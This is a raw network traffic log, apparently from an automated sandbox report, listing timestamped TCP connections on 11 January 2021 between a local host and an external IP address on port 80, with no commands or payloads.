      Jan 11, 2021 17:55:07.607870102 CET4978380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.608453035 CET4978380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.871875048 CET8049783210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:07.872272968 CET4978380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.872544050 CET4978380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:07.879726887 CET4978480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:08.135557890 CET8049783210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:08.142967939 CET8049784210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:08.143233061 CET4978480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:08.144635916 CET4978480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:08.404642105 CET8049784210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:08.404871941 CET4978480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:08.405071020 CET4978480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:08.512653112 CET4978580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:08.664171934 CET8049784210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:08.775219917 CET8049785210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:08.775336027 CET4978580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:08.776441097 CET4978580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.039418936 CET8049785210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:09.039637089 CET4978580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.039901018 CET4978580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.047516108 CET4978680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.302074909 CET8049785210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:09.308259010 CET8049786210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:09.308445930 CET4978680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.309863091 CET4978680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.571054935 CET8049786210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:09.571443081 CET4978680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.571702003 CET4978680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.579350948 CET4978780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.832011938 CET8049786210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:09.839708090 CET8049787210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:09.839843035 CET4978780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:09.840960979 CET4978780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:10.102114916 CET8049787210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:10.102302074 CET4978780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:10.119533062 CET4978780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:10.297887087 CET4978880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:10.379755020 CET8049787210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:10.565547943 CET8049788210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:10.565675020 CET4978880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:10.567939997 CET4978880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:10.835975885 CET8049788210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:10.836183071 CET4978880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:10.836496115 CET4978880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:10.841007948 CET4978980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:11.103831053 CET8049788210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:11.119932890 CET8049789210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:11.120126009 CET4978980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:11.295078993 CET4978980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:11.574569941 CET8049789210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:11.574765921 CET4978980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:11.575036049 CET4978980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:11.579282045 CET4979080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:11.843187094 CET8049790210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:11.843467951 CET4979080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:11.853642941 CET8049789210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:12.345470905 CET4979080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:12.610202074 CET8049790210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:12.610383034 CET4979080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:12.613713026 CET4979080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:12.731170893 CET4979180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:12.877278090 CET8049790210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:13.008481026 CET8049791210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:13.008635998 CET4979180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.009207964 CET4979180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.444442034 CET8049791210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:13.444569111 CET4979180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.445024014 CET4979180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.448457003 CET4979280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.707659006 CET8049792210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:13.707861900 CET4979280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.708411932 CET4979280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.741425991 CET8049791210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:13.967778921 CET8049792210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:13.967963934 CET4979280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.968061924 CET4979280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:13.971265078 CET4979380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:14.226835012 CET8049792210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:14.232239008 CET8049793210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:14.232367992 CET4979380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:14.233062029 CET4979380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:14.494489908 CET8049793210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:14.494580984 CET4979380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:14.494764090 CET4979380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:14.605611086 CET4979680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:14.755124092 CET8049793210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:14.874973059 CET8049796210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:14.875333071 CET4979680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:14.876337051 CET4979680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.145694017 CET8049796210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:15.145904064 CET4979680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.146059990 CET4979680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.149799109 CET4979780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.414514065 CET8049796210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:15.414576054 CET8049797210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:15.414864063 CET4979780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.415507078 CET4979780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.679867029 CET8049797210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:15.679977894 CET4979780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.680120945 CET4979780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.683638096 CET4979880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.943519115 CET8049797210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:15.947134972 CET8049798210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:15.947226048 CET4979880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:15.947823048 CET4979880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:16.212260962 CET8049798210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:16.212354898 CET4979880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:16.212563038 CET4979880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:16.323406935 CET4979980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:16.475888968 CET8049798210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:16.590364933 CET8049799210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:16.590521097 CET4979980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:16.591037035 CET4979980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:16.858326912 CET8049799210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:16.858547926 CET4979980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:16.858702898 CET4979980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:16.862164974 CET4980080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.125408888 CET8049799210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:17.129234076 CET8049800210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:17.131637096 CET4980080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.132344007 CET4980080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.399684906 CET8049800210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:17.399807930 CET4980080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.400013924 CET4980080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.403150082 CET4980180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.659698009 CET8049801210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:17.659847975 CET4980180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.660536051 CET4980180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.666426897 CET8049800210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:17.917649031 CET8049801210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:17.919794083 CET4980180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:17.919867039 CET4980180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.026834011 CET4980280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.176665068 CET8049801210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:18.293952942 CET8049802210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:18.294059992 CET4980280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.294675112 CET4980280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.562208891 CET8049802210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:18.562304020 CET4980280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.562467098 CET4980280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.566272974 CET4980380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.822650909 CET8049803210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:18.823811054 CET4980380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.824387074 CET4980380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:18.828937054 CET8049802210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:19.081305027 CET8049803210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:19.081432104 CET4980380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:19.081513882 CET4980380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:19.084938049 CET4980580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:19.337630033 CET8049803210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:19.348139048 CET8049805210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:19.348242998 CET4980580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:19.348949909 CET4980580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:19.612787008 CET8049805210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:19.612893105 CET4980580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:19.612997055 CET4980580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:19.731240988 CET4980680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:19.876055002 CET8049805210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:20.000282049 CET8049806210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:20.000500917 CET4980680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.001885891 CET4980680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.271342993 CET8049806210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:20.271557093 CET4980680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.271785975 CET4980680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.279525995 CET4980780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.540303946 CET8049806210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:20.541095018 CET8049807210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:20.544071913 CET4980780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.544534922 CET4980780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.805959940 CET8049807210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:20.807897091 CET4980780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.808012962 CET4980780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:20.811588049 CET4980880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.069083929 CET8049807210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:21.082153082 CET8049808210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:21.082257032 CET4980880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.083111048 CET4980880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.354104996 CET8049808210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:21.354187012 CET4980880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.354362965 CET4980880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.465490103 CET4980980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.624634981 CET8049808210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:21.727736950 CET8049809210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:21.727838993 CET4980980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.728523016 CET4980980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.991290092 CET8049809210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:21.992486000 CET4980980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.992543936 CET4980980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:21.995659113 CET4981080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:22.254673958 CET8049809210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:22.255203009 CET8049810210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:22.255536079 CET4981080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:22.255980968 CET4981080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:22.516060114 CET8049810210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:22.516468048 CET4981080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:22.516508102 CET4981080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:22.521601915 CET4981180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:22.775974035 CET8049810210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:22.800739050 CET8049811210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:22.800949097 CET4981180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:22.804016113 CET4981180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.083775043 CET8049811210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:23.083892107 CET4981180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.084054947 CET4981180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.199140072 CET4981280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.366537094 CET8049811210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:23.466797113 CET8049812210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:23.466936111 CET4981280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.467602015 CET4981280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.732043982 CET8049812210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:23.732249022 CET4981280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.732579947 CET4981280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.739217043 CET4981380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:23.996186972 CET8049812210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:24.010421038 CET8049813210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:24.010626078 CET4981380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.011401892 CET4981380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.282001972 CET8049813210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:24.282222033 CET4981380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.282319069 CET4981380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.286654949 CET4981480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.546802998 CET8049814210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:24.547049999 CET4981480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.547841072 CET4981480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.552020073 CET8049813210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:24.808159113 CET8049814210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:24.808275938 CET4981480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.808423042 CET4981480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:24.922774076 CET4981580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.067909956 CET8049814210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:25.192706108 CET8049815210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:25.192925930 CET4981580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.193589926 CET4981580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.463578939 CET8049815210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:25.463682890 CET4981580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.463846922 CET4981580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.467310905 CET4981680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.728919983 CET8049816210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:25.729044914 CET4981680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.729624033 CET4981680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.732960939 CET8049815210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:25.991885900 CET8049816210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:25.992351055 CET4981680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:25.992469072 CET4981680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:26.031302929 CET4981780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:26.253969908 CET8049816210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:26.294991016 CET8049817210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:26.296475887 CET4981780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:26.297059059 CET4981780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:26.560982943 CET8049817210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:26.564444065 CET4981780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:26.564568043 CET4981780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:26.685565948 CET4981880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:26.827697039 CET8049817210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:26.956664085 CET8049818210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:26.956850052 CET4981880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:26.957791090 CET4981880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:27.229217052 CET8049818210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:27.229430914 CET4981880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:27.229677916 CET4981880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:27.234066963 CET4981980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:27.500539064 CET8049818210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:27.504892111 CET8049819210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:27.505104065 CET4981980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:27.505677938 CET4981980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:27.777065039 CET8049819210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:27.777165890 CET4981980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:27.777941942 CET4981980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:27.781567097 CET4982080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.043751001 CET8049820210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:28.043868065 CET4982080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.048362970 CET8049819210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:28.050844908 CET4982080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.313766956 CET8049820210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:28.313868046 CET4982080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.317207098 CET4982080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.451966047 CET4982180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.579369068 CET8049820210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:28.719800949 CET8049821210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:28.719928980 CET4982180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.720854044 CET4982180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.988908052 CET8049821210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:28.989188910 CET4982180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.989212036 CET4982180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:28.992609024 CET4982280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:29.256777048 CET8049821210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:29.259210110 CET8049822210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:29.260097027 CET4982280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:29.263376951 CET4982280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:29.530343056 CET8049822210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:29.530641079 CET4982280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:29.545372963 CET4982280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:29.552666903 CET4982380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:29.811691999 CET8049822210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:29.813112020 CET8049823210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:29.813324928 CET4982380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:29.813901901 CET4982380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.075021982 CET8049823210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:30.075135946 CET4982380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.075263977 CET4982380192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.184822083 CET4982480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.335325003 CET8049823210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:30.445678949 CET8049824210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:30.445818901 CET4982480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.446429968 CET4982480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.707518101 CET8049824210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:30.707684040 CET4982480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.707993984 CET4982480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.716459036 CET4982680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.968346119 CET8049824210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:30.976041079 CET8049826210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:30.976182938 CET4982680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:30.978195906 CET4982680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:31.238159895 CET8049826210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:31.238327026 CET4982680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:31.238568068 CET4982680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:31.254580021 CET4982780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:31.497919083 CET8049826210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:31.512098074 CET8049827210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:31.512214899 CET4982780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:31.513567924 CET4982780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:31.771861076 CET8049827210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:31.772027969 CET4982780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:31.772294044 CET4982780192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:31.893855095 CET4982880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.032490969 CET8049827210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:32.156980038 CET8049828210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:32.157300949 CET4982880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.158154011 CET4982880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.421650887 CET8049828210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:32.421794891 CET4982880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.422034025 CET4982880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.428615093 CET4982980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.684603930 CET8049828210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:32.697470903 CET8049829210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:32.697617054 CET4982980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.698961973 CET4982980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.968071938 CET8049829210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:32.968254089 CET4982980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.968524933 CET4982980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:32.974188089 CET4983080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:33.237174034 CET8049829210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:33.237236023 CET8049830210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:33.237701893 CET4983080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:33.239017010 CET4983080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:33.502808094 CET8049830210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:33.505142927 CET4983080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:33.505189896 CET4983080192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:33.621778011 CET4983180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:33.768245935 CET8049830210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:33.883436918 CET8049831210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:33.883569956 CET4983180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:33.884963036 CET4983180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.146928072 CET8049831210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:34.147186041 CET4983180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.147263050 CET4983180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.152157068 CET4983280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.408248901 CET8049831210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:34.412342072 CET8049832210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:34.412596941 CET4983280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.413079977 CET4983280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.673830032 CET8049832210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:34.674117088 CET4983280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:34.674196005 CET4983280192.168.2.4210.116.91.80
